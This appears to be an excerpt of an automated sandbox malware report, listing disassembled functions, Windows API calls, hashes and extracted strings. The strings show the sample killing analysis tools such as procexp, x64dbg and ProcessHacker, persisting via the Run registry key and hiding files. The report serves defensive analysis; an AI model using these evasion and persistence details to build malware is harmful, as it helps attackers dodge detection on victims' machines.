                                                                                                                                                                                                                                  • Instruction ID: 3e4b0730fcfebc19f90bcfa93ca5cf8126e6d7aed499c129a043ced692030a8d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C81E036608B8286E760DB55F84436AF7A0FBD9B91F504175DA8D83B68EF7CD0488F10
                                                                                                                                                                                                                                  Function 00007FF72A023074 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02440C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A0230AF), ref: 00007FF72A024454
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02440C: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A0230AF), ref: 00007FF72A024491
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02440C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A0230AF), ref: 00007FF72A02449C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023B4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A0230B4), ref: 00007FF72A023B8F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023B4C: RegSetValueExW.ADVAPI32 ref: 00007FF72A023BC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023B4C: RegCloseKey.ADVAPI32 ref: 00007FF72A023BD4
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023BEC: RegDeleteKeyW.ADVAPI32 ref: 00007FF72A023C04
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF72A023DFF
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: Process32FirstW.KERNEL32 ref: 00007FF72A023E32
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: CloseHandle.KERNEL32 ref: 00007FF72A023E44
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: wcscmp.MSVCRT ref: 00007FF72A023E59
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: OpenProcess.KERNEL32 ref: 00007FF72A023E6F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: TerminateProcess.KERNEL32 ref: 00007FF72A023E92
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: CloseHandle.KERNEL32 ref: 00007FF72A023EA0
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: Process32NextW.KERNEL32 ref: 00007FF72A023EB3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A023DEC: CloseHandle.KERNEL32 ref: 00007FF72A023EC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02397C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF72A023AD4), ref: 00007FF72A0239AC
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF72A02315E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                  • Opcode ID: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction ID: a7f287538e3ea8ab402efb97ebaf6ec384816453b1fc8ae05c7af0b889a50917
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A21A924A1874393FB21BB64ECA12F5A624EF50300FC005F1E51D4A1E6FE5EE9098E76
                                                                                                                                                                                                                                  Function 00007FF72A022E04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                                                  • Opcode ID: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction ID: 21995df04141f8669cc3e23718b79f3d0a820a646a17de84cf97e28f9c4cac2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E01A92A90CB4383F730AB51EC54239E764FB9CB95F840571E98E42674EE3CD5898A15
                                                                                                                                                                                                                                  Function 00007FF72A023DEC Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                                                  • Opcode ID: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction ID: d0f9f374433241028ef7c47b5c3078bb8734e4fbb51f27ca2649dcfb03a54f33
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83219C75A0CA8782FB70AB11EC5836AA361FBC4B54F804275C69D425E8EF3DD449CF14
                                                                                                                                                                                                                                  Function 00007FF72A022EA4 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                                                  • Opcode ID: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction ID: 17e995db9699555fa35e00a5a604bf6b59eac96654d5ecd18008bb72d062beb8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9501792691CB83C3F730AB51EC54229A360FBDCB55F800575E98E46664EE3CD5588E14
                                                                                                                                                                                                                                  Function 00007FF72A023CAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                  • Opcode ID: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction ID: f76c29e63c43dd2d2aad758d557f243054751c063387ca95dd74fc8224b4eb9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531B87661CBC586E770EB15F8987AAB3A0F788740F400265DA8D83B68EF3CD554CB14
                                                                                                                                                                                                                                  Function 00007FF72A023B4C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                                                  • Opcode ID: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction ID: dac62a9d699b1304df47c7a367696d3376e1389bd60fcca7f02103f53c604344
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77012536618B81CBEB609B14E84471AB7A0F788794F801221EB8D43B68EF7CD149CF14
                                                                                                                                                                                                                                  Function 00007FF72A0213C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                                  • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction ID: 84a42bb15748f9b4d75e475a35faf1e9adeb272a17faf8cd2e1a4091bb8a3c4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5801DA3190874387F730AF10E854369A7A4FB84348FD041B5D68D42694EF7CE949CF14
                                                                                                                                                                                                                                  Function 00007FF72A023FCC Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                                                  • Opcode ID: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction ID: fbdd9d350fe80ae5c242e56537e1fd277177afad2296f978864ac1895668fe4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7411EC75A0CB8786F770AB11E8883AAA3A0FB84754F804275D69D46698EF3ED448DF10
                                                                                                                                                                                                                                  Function 00007FF72A02397C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                  • Opcode ID: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction ID: 3f51783c896029a410678f8028eaeeb02e086e8e592cd88e20a094e5e2188755
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0861401507e3e28e0f8f7b1c81fb4f9c72ec93ea9459558044e0fcb2a0648aa1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E11363552874187E7A09B14F84466AB7A0F7847A0F505271F95E43BE8DF7CD145CF10
                                                                                                                                                                                                                                  Function 00007FF72A021088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                                  • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction ID: 6a41714fb0f81dffaf96a54383035f68932a1aec9e9b4f3c73d8544e0fd17fa9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E0ED21918B83C3E730AB10FC95369A3A0FB84754FD00171D98D42664EF7CE549CF58
                                                                                                                                                                                                                                  Function 00007FF72A022F34 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A02390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A02395D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02452C: CreateFileW.KERNEL32 ref: 00007FF72A024573
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A0210D8: OpenProcess.KERNEL32 ref: 00007FF72A0210FC
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF72A022FCF
                                                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF72A022FE2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                                  • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                                  • Opcode ID: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction ID: 92acb5d519a38cc78c63af9c7df35d0f0de9eaf908cdbab402577194a0b26bea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11B624918B8383F730EB60EC483A6B3A0EB88744FC041B5D54C46669EF7CE4498F68

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:23.9%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:479
                                                                                                                                                                                                                                  Total number of Limit Nodes:5
